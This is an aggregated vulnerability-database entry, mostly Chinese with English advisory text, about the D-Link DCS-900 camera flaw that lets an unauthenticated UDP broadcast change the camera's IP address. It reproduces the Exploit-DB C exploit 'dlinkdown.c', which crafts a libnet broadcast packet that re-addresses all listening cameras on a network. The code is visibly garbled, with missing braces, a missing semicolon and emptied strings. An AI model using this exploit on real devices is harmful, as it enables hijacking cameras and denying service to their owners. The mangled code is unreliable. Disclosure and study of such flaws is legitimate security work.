发布时间 :2004-08-31 00:00:00
修订时间 :2017-07-10 21:31:13

[原文]D-Link DCS-900 Internet Camera listens on UDP port 62976 for an IP address, which allows remote attackers to change the IP address of the camera via a UDP broadcast packet.

[CNNVD]D-Link Securicam Network DCS-900 Internet Camera远程配置漏洞(CNNVD-200408-238)

        D-Link DCS-900 Internet Camera在UDP 62976端口侦听IP地址。远程攻击者借助UDP广播数据包改变摄像机的IP地址。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040831 D-Link DCS-900 IP camera remote exploit that change the IP
(UNKNOWN)  XF  dlink-dcs900-ip-modification(17171)

- 漏洞信息

D-Link Securicam Network DCS-900 Internet Camera远程配置漏洞
高危 设计错误
2004-08-31 00:00:00 2005-10-20 00:00:00
        D-Link DCS-900 Internet Camera在UDP 62976端口侦听IP地址。远程攻击者借助UDP广播数据包改变摄像机的IP地址。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: .

- 漏洞信息 (425)

D-Link DCS-900 Camera Remote IP Address Changer Exploit (EDBID:425)
hardware remote
2004-08-31 Verified
0 n/a
N/A [点击下载]
  dlinkdown.c -

  change ip address on all dlink dcs-900 cameras on the local network without authentication

  dlink dcs-900 ip cameras use a broadcast/listen method of configuration ...
  rather than a static ip addr out of the box, it listens for a 62976/udp broadcast packet
  telling it what ip addr to set itself too

  rtfs and mod the ip address to set all listening cameras too (default is

#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]) {

	libnet_t *p;
	libnet_ptag_t ip, udp, ipoptions, ether;
	u_long srcip, dstip;
	u_short srcport = 62976, dstport = 62976, x;
	signed int ret;
	char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
	int len;
	int8_t *macdst = "ff:ff:ff:ff:ff:ff";
	u_int8_t *macdest;
	char payload[128] = 	"\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
				"\x0a\x00\x32\x32" /* ip address to set too */
	u_short payloadlen = strlen(payload);

	srcip = libnet_get_ipaddr4(p); /* mod to spoof */
	dstip = libnet_name2addr4(p,"",LIBNET_DONT_RESOLVE); /* */
	udp = ip = ether = ipoptions = 0;

	if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
		fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
		exit (1);

	if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
		fprintf(stderr,"cant init() - %s\n",errbuff);
		exit (1);

	if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
		fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
		exit (1);

	for (x=0;x<20;x++) {
		ipopt[x] = libnet_get_prand(LIBNET_PR2);

	ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);

	if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen + LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,
0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
		fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
		exit (1);

	if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
		fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
		exit (1);


	if ( (ret = libnet_write(p)) == -1) {
	free(macdest); /* hex_aton malloc's - see libnet doco */

	return 0;

// [2004-08-31]

- 漏洞信息

D-Link DCS-900 Camera Arbitrary Remote IP Address Modification
Remote / Network Access Infrastructure
Loss of Confidentiality, Loss of Availability
Exploit Public

- 漏洞描述

The D-Link DCS-900 internet camera contains a flaw that may allow a malicious user to remotely change the camera IP address. The issue is triggered when a malicious user sends specially crafted UDP packets to the camera bypassing authentication. It is possible that the flaw may allow the user to change configuration options such as the IP address of the camera resulting in a loss of confidentiality and/or availability.

- 时间线

2004-08-31 Unknow
2004-08-31 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

D-Link Securicam Network DCS-900 Internet Camera Remote Configuration Vulnerability
Design Error 11072
Yes No
2004-08-31 12:00:00 2009-07-12 06:17:00
The individual responsible for discovery of this issue is currently unknown.

- 受影响的程序版本

D-Link DCS-900 Internet Camera 2.28
D-Link DCS-900 Internet Camera 2.20
D-Link DCS-900 Internet Camera 2.10

- 漏洞讨论

D-Link Securicam Network DCS-900 Internet Camera is reportedly affected by a remote configuration vulnerability. This issue is due to a design error that allow remote, unauthorized users to update the IP address of the vulnerable camera.

An attacker may leverage this issue to hijack the vulnerable camera, ultimately triggering a denial of service condition, as the unsuspecting user will be unable to connect to the device without having its IP address.

- 漏洞利用

The following exploit has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

- 相关参考